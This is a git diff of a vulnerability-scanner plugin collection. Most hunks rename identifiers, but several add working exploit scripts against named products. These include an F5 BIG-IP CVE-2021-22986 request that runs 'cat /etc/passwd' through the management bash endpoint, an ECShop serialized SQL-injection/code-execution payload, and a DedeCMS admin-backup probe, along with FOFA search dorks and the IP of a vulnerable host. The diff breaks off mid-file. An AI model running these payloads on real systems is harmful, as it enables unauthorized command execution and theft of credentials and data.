POC描述,写更新描述,没有就不写 "name" : "Coremail 配置信息泄露漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "Coremail", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/CtCMS_赤兔CMS/Get_Banner/__pycache__/poc.cpython-38.pyc b/poc/CtCMS_赤兔CMS/Get_Banner/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..24c7faa Binary files /dev/null and b/poc/CtCMS_赤兔CMS/Get_Banner/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/CtCMS_赤兔CMS/Get_Banner/poc.py b/poc/CtCMS_赤兔CMS/Get_Banner/poc.py index 840540d..c04ba3e 100644 --- a/poc/CtCMS_赤兔CMS/Get_Banner/poc.py +++ b/poc/CtCMS_赤兔CMS/Get_Banner/poc.py @@ -19,7 +19,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "赤兔CMS banner识别插件", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "赤兔CMS", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/DVR/Login_Bypass_CVE_2018_9995/__pycache__/poc.cpython-38.pyc b/poc/DVR/Login_Bypass_CVE_2018_9995/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..d919e32 Binary files /dev/null and b/poc/DVR/Login_Bypass_CVE_2018_9995/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/D_Link/RCE_ShareCenter_system_mgr_cgi/__pycache__/poc.cpython-38.pyc b/poc/D_Link/RCE_ShareCenter_system_mgr_cgi/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..bcaed03 Binary files /dev/null and b/poc/D_Link/RCE_ShareCenter_system_mgr_cgi/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/D_Link/RCE_ShareCenter_system_mgr_cgi/poc.py b/poc/D_Link/RCE_ShareCenter_system_mgr_cgi/poc.py index 0942745..8fa7c22 100644 --- a/poc/D_Link/RCE_ShareCenter_system_mgr_cgi/poc.py +++ b/poc/D_Link/RCE_ShareCenter_system_mgr_cgi/poc.py @@ -19,7 +19,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "D-Link ShareCenter DNS-320 system_mgr.cgi 远程命令执行漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "D-Link ShareCenter DNS-320", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/D_Link/UPInfo_Disclosure_getcfg_php_CVE_2019_17506/__pycache__/poc.cpython-38.pyc b/poc/D_Link/UPInfo_Disclosure_getcfg_php_CVE_2019_17506/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..c3e6ae6 Binary files /dev/null and b/poc/D_Link/UPInfo_Disclosure_getcfg_php_CVE_2019_17506/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/D_Link/UPInfo_Disclosure_getcfg_php/poc.py b/poc/D_Link/UPInfo_Disclosure_getcfg_php_CVE_2019_17506/poc.py similarity index 100% rename from poc/D_Link/UPInfo_Disclosure_getcfg_php/poc.py rename to poc/D_Link/UPInfo_Disclosure_getcfg_php_CVE_2019_17506/poc.py diff --git a/poc/D_Link/Weak_Pass_AC_Manager/__pycache__/poc.cpython-38.pyc b/poc/D_Link/Weak_Pass_AC_Manager/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..e73a5db Binary files /dev/null and b/poc/D_Link/Weak_Pass_AC_Manager/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/D_Link/Weak_Pass_AC_Manager/poc.py b/poc/D_Link/Weak_Pass_AC_Manager/poc.py index 7ec186c..d36937d 100644 --- a/poc/D_Link/Weak_Pass_AC_Manager/poc.py +++ b/poc/D_Link/Weak_Pass_AC_Manager/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "D-Link AC管理系统默认账号密码", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "D-Link AC管理系统", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/DedeCMS_织梦/Info_Disclosure_IIS_Short_Filename/__pycache__/poc.cpython-38.pyc b/poc/DedeCMS_织梦/Info_Disclosure_IIS_Short_Filename/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..2527b33 Binary files /dev/null and b/poc/DedeCMS_织梦/Info_Disclosure_IIS_Short_Filename/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/DedeCMS_织梦/Info_Disclosure_IIS_Short_Filename/poc.py b/poc/DedeCMS_织梦/Info_Disclosure_IIS_Short_Filename/poc.py new file mode 100644 index 0000000..cce10fc --- /dev/null +++ b/poc/DedeCMS_织梦/Info_Disclosure_IIS_Short_Filename/poc.py @@ -0,0 +1,76 @@ +# coding:utf-8 +import requests +from lib.core.common import url_handle,get_random_ua +from lib.core.poc import POCBase +# ... +import urllib3 +urllib3.disable_warnings() + +class POC(POCBase): + + _info = { + "author" : "jijue", # POC作者 + "version" : "1", # POC版本,默认是1 + "CreateDate" : "2021-06-09", # POC创建时间 + "UpdateDate" : "2021-06-09", # POC创建时间 + "PocDesc" : """ + 备份文件的地址会写在md输出中 + """, # POC描述,写更新描述,没有就不写 + + "name" : "DedeCMS 短文件名信息泄露", # 漏洞名称 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "AppName" : "", # 漏洞应用名称 + "AppVersion" : "", # 漏洞应用版本 + "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx + "VulnDesc" : """ + IIS下,会因为固有的短文件名问题导致配置文件的地址可以被猜解 + 猜解出来的文件url,存的信息是dede_admin表的备份,可能存在过期现象,要有心理准备 + """, # 漏洞简要描述 + + "fofa-dork":""" + + """, # fofa搜索语句 + "example" : "", # 存在漏洞的演示url,写一个就可以了 + "exp_img" : "", # 先不管 + } + + def _verify(self): + """ + 返回vuln + + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + + 不存在漏洞:vuln = [False,""] + """ + vuln = [False,""] + url = self.target + "/data/backupdata/dede_a~" # url自己按需调整 + + + headers = {"User-Agent":get_random_ua(), + "Connection":"close", + # "Content-Type": "application/x-www-form-urlencoded", + } + + try: + """ + 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 + """ + for i in range(1,9): + now_url = url + str(i) + ".txt" + req = requests.get(now_url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False) + if req.status_code == 200 and "INSERT INTO `dede_admin`" in req.text: + vuln = [True,"" + now_url + "\n" + req.text] + break + else: + vuln = [False,req.text] + except Exception as e: + raise e + + # 以下逻辑酌情使用 + if self._honeypot_check(vuln[1]) == True: + vuln[0] = False + + return vuln + + def _attack(self): + return self._verify() \ No newline at end of file diff --git a/poc/DedeCMS_织梦/RadminPass/__pycache__/poc.cpython-38.pyc b/poc/DedeCMS_织梦/RadminPass/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..6f4c93e Binary files /dev/null and b/poc/DedeCMS_织梦/RadminPass/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/DedeCMS_织梦/RadminPass/poc.py b/poc/DedeCMS_织梦/RadminPass/poc.py index 5ab6e97..9ea1e47 100644 --- a/poc/DedeCMS_织梦/RadminPass/poc.py +++ b/poc/DedeCMS_织梦/RadminPass/poc.py @@ -17,8 +17,8 @@ class POC(POCBase): 略 """, # POC描述,写更新描述,没有就不写 - "name" : "radminpass.php文件暴露", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "name" : "织梦CMS radminpass.php文件暴露", # 漏洞名称 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "dedecms", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/DocCMS/SQLi_keyword/__pycache__/poc.cpython-38.pyc b/poc/DocCMS/SQLi_keyword/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..b841ff3 Binary files /dev/null and b/poc/DocCMS/SQLi_keyword/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/DocCMS/SQLi_keyword/poc.py b/poc/DocCMS/SQLi_keyword/poc.py index fe4ff61..54d3d18 100644 --- a/poc/DocCMS/SQLi_keyword/poc.py +++ b/poc/DocCMS/SQLi_keyword/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "DocCMS keyword SQL注入漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "DocCMS", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/DrayTek/RCE_CVE_2020_8515/__pycache__/poc.cpython-38.pyc b/poc/DrayTek/RCE_CVE_2020_8515/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..b5ae1f7 Binary files /dev/null and b/poc/DrayTek/RCE_CVE_2020_8515/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Drupal!/RCE_CVE_2018_7600/__pycache__/poc.cpython-38.pyc b/poc/Drupal!/RCE_CVE_2018_7600/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..f11ec34 Binary files /dev/null and b/poc/Drupal!/RCE_CVE_2018_7600/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/ECShop/RCE_2dotX_OR_3dotX/__pycache__/poc.cpython-38.pyc b/poc/ECShop/RCE_2dotX_OR_3dotX/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..d3d2541 Binary files /dev/null and b/poc/ECShop/RCE_2dotX_OR_3dotX/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/ECShop/RCE_2dotX_OR_3dotX/poc.py b/poc/ECShop/RCE_2dotX_OR_3dotX/poc.py new file mode 100644 index 0000000..ab76bec --- /dev/null +++ b/poc/ECShop/RCE_2dotX_OR_3dotX/poc.py @@ -0,0 +1,73 @@ +# coding:utf-8 +import requests,re +from lib.core.common import url_handle,get_random_ua +from lib.core.poc import POCBase +# ... +import urllib3 +urllib3.disable_warnings() + +class POC(POCBase): + + _info = { + "author" : "jijue", # POC作者 + "version" : "1", # POC版本,默认是1 + "CreateDate" : "2022-01-01", # POC创建时间 + "UpdateDate" : "2022-01-01", # POC创建时间 + "PocDesc" : """ + 略 + """, # POC描述,写更新描述,没有就不写 + + "name" : "ECShop 2.x/3.x SQL 注入/远程代码执行漏洞", # 漏洞名称 + "VulnID" : "oFx-2022-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "AppName" : "", # 漏洞应用名称 + "AppVersion" : "", # 漏洞应用版本 + "VulnDate" : "2022-01-01", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx + "VulnDesc" : """ + + """, # 漏洞简要描述 + + "fofa-dork":""" + + """, # fofa搜索语句 + "example" : "", # 存在漏洞的演示url,写一个就可以了 + "exp_img" : "", # 先不管 + } + + def _verify(self): + """ + 返回vuln + + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + + 不存在漏洞:vuln = [False,""] + """ + vuln = [False,""] + url = self.target + "/user.php?act=login" # url自己按需调整 + regular = "PHP Version [0-9\.]+" + + headers = {"User-Agent":get_random_ua(), + "Connection":"close", + "Referer": """45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a""", + # "Content-Type": "application/x-www-form-urlencoded", + } + + try: + """ + 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 + """ + req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False) + if re.search(regular,req.text):#req.status_code == 200 and : + vuln = [True,req.text] + else: + vuln = [False,req.text] + except Exception as e: + raise e + + # 以下逻辑酌情使用 + if self._honeypot_check(vuln[1]) == True: + vuln[0] = False + + return vuln + + def _attack(self): + return self._verify() \ No newline at end of file diff --git a/poc/ECShop/SQLi_delete_cart_goods/__pycache__/poc.cpython-38.pyc b/poc/ECShop/SQLi_delete_cart_goods/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..5848e40 Binary files /dev/null and b/poc/ECShop/SQLi_delete_cart_goods/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Elasticsearch/Cmd_Exec_MVEL_CVE-2014-3120/__pycache__/poc.cpython-38.pyc b/poc/Elasticsearch/Cmd_Exec_MVEL_CVE-2014-3120/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..4d0f9ac Binary files /dev/null and b/poc/Elasticsearch/Cmd_Exec_MVEL_CVE-2014-3120/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Elasticsearch/Code_Exec_Groovy_CVE-2015-1427/__pycache__/poc.cpython-38.pyc b/poc/Elasticsearch/Code_Exec_Groovy_CVE-2015-1427/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..aa2fe15 Binary files /dev/null and b/poc/Elasticsearch/Code_Exec_Groovy_CVE-2015-1427/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Elasticsearch/Dir_Traversal_CVE-2015-5531/__pycache__/poc.cpython-38.pyc b/poc/Elasticsearch/Dir_Traversal_CVE-2015-5531/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..fceb642 Binary files /dev/null and b/poc/Elasticsearch/Dir_Traversal_CVE-2015-5531/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Elasticsearch/File_Create_WooYun-2015-110216/__pycache__/poc.cpython-38.pyc b/poc/Elasticsearch/File_Create_WooYun-2015-110216/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..053106a Binary files /dev/null and b/poc/Elasticsearch/File_Create_WooYun-2015-110216/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Elasticsearch/Unauth_Access/__pycache__/poc.cpython-38.pyc b/poc/Elasticsearch/Unauth_Access/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..41bf8a2 Binary files /dev/null and b/poc/Elasticsearch/Unauth_Access/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Eyou_亿邮/RCE_moni_detail/__pycache__/poc.cpython-38.pyc b/poc/Eyou_亿邮/RCE_moni_detail/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..b2f205e Binary files /dev/null and b/poc/Eyou_亿邮/RCE_moni_detail/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/F5_BIG_IP/File_Read_CVE_2020_5902/__pycache__/poc.cpython-38.pyc b/poc/F5_BIG_IP/File_Read_CVE_2020_5902/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..982cce3 Binary files /dev/null and b/poc/F5_BIG_IP/File_Read_CVE_2020_5902/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/F5_BIG_IP/File_Read_CVE_2020_5902/poc.py b/poc/F5_BIG_IP/File_Read_CVE_2020_5902/poc.py index 269fcfa..e5c1d9b 100644 --- a/poc/F5_BIG_IP/File_Read_CVE_2020_5902/poc.py +++ b/poc/F5_BIG_IP/File_Read_CVE_2020_5902/poc.py @@ -33,7 +33,7 @@ class POC(POCBase): """, # 漏洞简要描述 "fofa-dork":""" - title="BIG-IP®" + title="BIG-IP®" """, # fofa搜索语句 "example" : "https://54.206.65.62:443", # 存在漏洞的演示url,写一个就可以了 "exp_img" : "", # 先不管 diff --git a/poc/F5_BIG_IP/RCE_CVE_2021-22986/__pycache__/poc.cpython-38.pyc b/poc/F5_BIG_IP/RCE_CVE_2021-22986/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..2294e13 Binary files /dev/null and b/poc/F5_BIG_IP/RCE_CVE_2021-22986/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/F5_BIG_IP/RCE_CVE_2021-22986/poc.py b/poc/F5_BIG_IP/RCE_CVE_2021-22986/poc.py new file mode 100644 index 0000000..f738899 --- /dev/null +++ b/poc/F5_BIG_IP/RCE_CVE_2021-22986/poc.py @@ -0,0 +1,75 @@ +# coding:utf-8 +import requests +from lib.core.common import url_handle,get_random_ua +from lib.core.poc import POCBase +# ... +import urllib3 +urllib3.disable_warnings() + +class POC(POCBase): + + _info = { + "author" : "jijue", # POC作者 + "version" : "1", # POC版本,默认是1 + "CreateDate" : "2021-06-09", # POC创建时间 + "UpdateDate" : "2021-06-09", # POC创建时间 + "PocDesc" : """ + 略 + """, # POC描述,写更新描述,没有就不写 + + "name" : "CVE-2021-22986 RCE", # 漏洞名称 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "AppName" : "", # 漏洞应用名称 + "AppVersion" : "", # 漏洞应用版本 + "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx + "VulnDesc" : """ + + """, # 漏洞简要描述 + + "fofa-dork":""" + title="BIG-IP®" + """, # fofa搜索语句 + "example" : "", # 存在漏洞的演示url,写一个就可以了 + "exp_img" : "", # 先不管 + } + + def _verify(self): + """ + 返回vuln + + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + + 不存在漏洞:vuln = [False,""] + """ + vuln = [False,""] + url = self.target + "/mgmt/tm/util/bash" # url自己按需调整 + data = r'''{"command": "run", "utilCmdArgs": "-c 'cat /etc/passwd'"}''' + + headers = {"User-Agent":get_random_ua(), + 'Accept': '*/*', + 'Connection': 'close', + 'Authorization': 'Basic YWRtaW46', + 'X-F5-Auth-Token': '', + 'Content-Type': 'application/json' + } + + try: + """ + 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 + """ + req = requests.post(url,data=data,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False) + if "root:/root" in req.text and req.status_code == 200: + vuln = [True,req.text] + else: + vuln = [False,req.text] + except Exception as e: + raise e + + # 以下逻辑酌情使用 + if self._honeypot_check(vuln[1]) == True: + vuln[0] = False + + return vuln + + def _attack(self): + return self._verify() \ No newline at end of file diff --git a/poc/FLIR_菲力尔/Download_File_AX8/__pycache__/poc.cpython-38.pyc b/poc/FLIR_菲力尔/Download_File_AX8/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..96950a8 Binary files /dev/null and b/poc/FLIR_菲力尔/Download_File_AX8/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/FLIR_菲力尔/Download_File_AX8/poc.py b/poc/FLIR_菲力尔/Download_File_AX8/poc.py index 3269b2e..32a996a 100644 --- a/poc/FLIR_菲力尔/Download_File_AX8/poc.py +++ b/poc/FLIR_菲力尔/Download_File_AX8/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "FLIR-AX8 download.php 任意文件下载", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "FLIR-AX8", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/Flask_Ssti_CVE-2017-12636/poc.py b/poc/Flask_Ssti_CVE-2017-12636/poc.py deleted file mode 100644 index 308d66a..0000000 --- a/poc/Flask_Ssti_CVE-2017-12636/poc.py +++ /dev/null @@ -1,59 +0,0 @@ -# coding:utf-8 -import requests -from lib.core.common import url_handle,get_random_ua -# ... -import urllib3 -urllib3.disable_warnings() -_info = { - "author" : "", # POC作者 - "version" : "1", # POC版本,默认是1 - "CreateDate" : "2021-06-09", # POC创建时间 - "UpdateDate" : "2021-06-09", # POC创建时间 - "PocDesc" : """ - 该POC不具备使用价值,请忽略 - """, # POC描述,写更新描述,没有就不写 - - "name" : "Flask 模板注入", # 漏洞名称 - "AppName" : "Flask", # 漏洞应用名称 - "AppVersion" : "", # 漏洞应用版本 - "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx - "VulnDesc" : """ - - """, # 漏洞简要描述 - - "fofa-dork":"", # fofa搜索语句 - "example" : "", # 存在漏洞的演示url,写一个就可以了 - "exp_img" : "", # 先不管 - - "timeout" : 10, # 超时设定 -} - -def verify(host,proxy): - """ - 返回vuln - 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 - 不存在漏洞:vuln = [False,""] - """ - vuln = [False,""] - url = url_handle(host) + "/?name={{233*233}}" # url自己按需调整 - - - - headers = {"User-Agent":get_random_ua(), - "Connection":"close", - # "Content-Type": "application/x-www-form-urlencoded", - } - - try: - """ - 检测逻辑,漏洞存在则修改vuln值,漏洞不存在则不动 - """ - req = requests.get(url,headers = headers , proxies = proxy ,timeout = self.timeout,verify = False) - if req.status_code == 200 and "54289" in req.text: - vuln = [True,req.text] - else: - vuln = [False,req.text] - except Exception as e: - raise e - - return vuln \ No newline at end of file diff --git a/poc/Grafana/File_Read_plugins/__pycache__/poc.cpython-38.pyc b/poc/Grafana/File_Read_plugins/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..20e77a0 Binary files /dev/null and b/poc/Grafana/File_Read_plugins/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/H2_DataBase/UnAuth_Access/__pycache__/poc.cpython-38.pyc b/poc/H2_DataBase/UnAuth_Access/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..4cad1d4 Binary files /dev/null and b/poc/H2_DataBase/UnAuth_Access/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/H2_DataBase/UnAuth_Access/poc.py b/poc/H2_DataBase/UnAuth_Access/poc.py index aeb1c32..3e05b91 100644 --- a/poc/H2_DataBase/UnAuth_Access/poc.py +++ b/poc/H2_DataBase/UnAuth_Access/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "H2 数据库 Web控制台未授权访问", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "H2 数据库", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/H3C/File_Download_SecPath_WAF/__pycache__/poc.cpython-38.pyc b/poc/H3C/File_Download_SecPath_WAF/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..2d6e641 Binary files /dev/null and b/poc/H3C/File_Download_SecPath_WAF/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/H3C/File_Download_SecPath_WAF/poc.py b/poc/H3C/File_Download_SecPath_WAF/poc.py index 4eccc77..025bf34 100644 --- a/poc/H3C/File_Download_SecPath_WAF/poc.py +++ b/poc/H3C/File_Download_SecPath_WAF/poc.py @@ -10,15 +10,16 @@ class POC(POCBase): _info = { "author" : "jijue", # POC作者 - "version" : "1", # POC版本,默认是1 + "version" : "2", # POC版本,默认是1 "CreateDate" : "2021-06-09", # POC创建时间 "UpdateDate" : "2021-06-09", # POC创建时间 "PocDesc" : """ - 略 + v1 : 略 + v2 : 小改进 """, # POC描述,写更新描述,没有就不写 "name" : "H3C SecPath 下一代防火墙 任意文件下载漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "H3C SecPath 下一代防火墙", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx @@ -55,11 +56,11 @@ class POC(POCBase): """ 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 """ - req0 = requests.get(url0,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False) + req0 = requests.get(url0,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False,allow_redirects=False) if "root::" in req0.text and req0.status_code == 200 : vuln = [True,req0.text] else: - req1 = requests.get(url1,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False) + req1 = requests.get(url1,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False,allow_redirects=False) if "root:" in req1.text and req1.status_code == 200: vuln = [True,req1.text] else: diff --git a/poc/HIKVISION/File_Down_Gateway_downFile_php/__pycache__/poc.cpython-38.pyc b/poc/HIKVISION/File_Down_Gateway_downFile_php/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..5372bac Binary files /dev/null and b/poc/HIKVISION/File_Down_Gateway_downFile_php/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/HIKVISION/File_Down_Gateway_downFile_php/poc.py b/poc/HIKVISION/File_Down_Gateway_downFile_php/poc.py index b04db0c..90c61a9 100644 --- a/poc/HIKVISION/File_Down_Gateway_downFile_php/poc.py +++ b/poc/HIKVISION/File_Down_Gateway_downFile_php/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "HIKVISION 视频编码设备接入网关 任意文件下载", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "海康威视视频接入网关系统", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/HIKVISION/File_Read_Stream_Media_Manager/__pycache__/poc.cpython-38.pyc b/poc/HIKVISION/File_Read_Stream_Media_Manager/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..f7b5d33 Binary files /dev/null and b/poc/HIKVISION/File_Read_Stream_Media_Manager/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/HIKVISION/Weak_Pass_Stream_Media_Manager/__pycache__/poc.cpython-38.pyc b/poc/HIKVISION/Weak_Pass_Stream_Media_Manager/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..cf622b1 Binary files /dev/null and b/poc/HIKVISION/Weak_Pass_Stream_Media_Manager/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/HIKVISION/Weak_Pass_Stream_Media_Manager/poc.py b/poc/HIKVISION/Weak_Pass_Stream_Media_Manager/poc.py index f91693b..de772eb 100644 --- a/poc/HIKVISION/Weak_Pass_Stream_Media_Manager/poc.py +++ b/poc/HIKVISION/Weak_Pass_Stream_Media_Manager/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "HIKVISION 流媒体管理服务器弱口令", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "HIKVISION 流媒体管理服务器", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/HST_好视通/File_Download/__pycache__/poc.cpython-38.pyc b/poc/HST_好视通/File_Download/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..db3a54a Binary files /dev/null and b/poc/HST_好视通/File_Download/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/HST_好视通/File_Download/poc.py b/poc/HST_好视通/File_Download/poc.py index 05f8662..cf6e603 100644 --- a/poc/HST_好视通/File_Download/poc.py +++ 